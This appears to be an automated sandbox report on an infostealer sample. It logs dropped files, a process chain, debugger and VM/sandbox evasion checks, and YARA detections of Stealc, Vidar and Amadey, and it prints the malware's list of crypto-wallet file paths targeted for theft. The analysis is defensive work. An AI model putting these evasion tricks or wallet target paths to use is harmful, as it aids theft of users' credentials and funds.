Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 69181E instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\DocumentsJDAFHCGIJE.exe

Code function: 25_2_052F07EE rdtsc

25_2_052F07EE

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1008361001\bca166439f.exe	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 6824	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6600	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5576	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 884	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8936	Thread sleep count: 59 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8936	Thread sleep time: -1770000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8936	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\DocumentsJDAFHCGIJE.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA6EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CA6EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: skotes.exe, skotes.exe, 0000001C.00000002.3386727418.00000000005E7000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Web Data.12.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Web Data.12.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: Web Data.12.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware~
Source: Web Data.12.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: Web Data.12.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000F0A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000001C.00000002.3388611571.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, 00000000.00000002.2662001774.0000000000662000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Web Data.12.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000002.2662001774.0000000000692000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW D
Source: Web Data.12.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Web Data.12.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Web Data.12.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: DocumentsJDAFHCGIJE.exe, 00000019.00000003.2665982800.0000000001337000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}2lq
Source: Web Data.12.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Web Data.12.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Web Data.12.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Web Data.12.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>g
Source: file.exe, 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Web Data.12.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Web Data.12.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Web Data.12.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Web Data.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2663182598.0000000001309000.00000040.00000001.01000000.00000003.sdmp, DocumentsJDAFHCGIJE.exe, 00000019.00000002.2692853608.0000000000D07000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000001A.00000002.2731854166.00000000005E7000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 0000001C.00000002.3386727418.00000000005E7000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000002.2687486247.0000000023400000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\lf7
Source: Web Data.12.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Web Data.12.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process queried: DebugPort
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort

Source: C:\Users\user\DocumentsJDAFHCGIJE.exe

Code function: 25_2_052F07EE rdtsc

25_2_052F07EE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CB3AC62

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_0042652B mov eax, dword ptr fs:[00000030h]		28_2_0042652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 28_2_0042A302 mov eax, dword ptr fs:[00000030h]		28_2_0042A302

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CB3AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 2128, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Section loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe protection: readonly

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsJDAFHCGIJE.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsJDAFHCGIJE.exe "C:\Users\user\DocumentsJDAFHCGIJE.exe"
Source: C:\Users\user\DocumentsJDAFHCGIJE.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CB84760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA61C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CA61C30

Source: file.exe, file.exe, 00000000.00000002.2663182598.0000000001309000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: jProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB3AE71 cpuid

0_2_6CB3AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB3A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CB3A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 28_2_003F65E0 LookupAccountNameA,

28_2_003F65E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CA88390 NSS_GetVersion,

0_2_6CA88390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 25.2.DocumentsJDAFHCGIJE.exe.b10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.skotes.exe.3f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000003.2652499898.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2691326542.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2692770432.0000000000B11000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2731767525.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3386405768.00000000003F1000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3258434469.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000003.2152563709.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2662760280.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2662001774.000000000061E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 2128, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 2128, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2662760280.0000000000FFC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
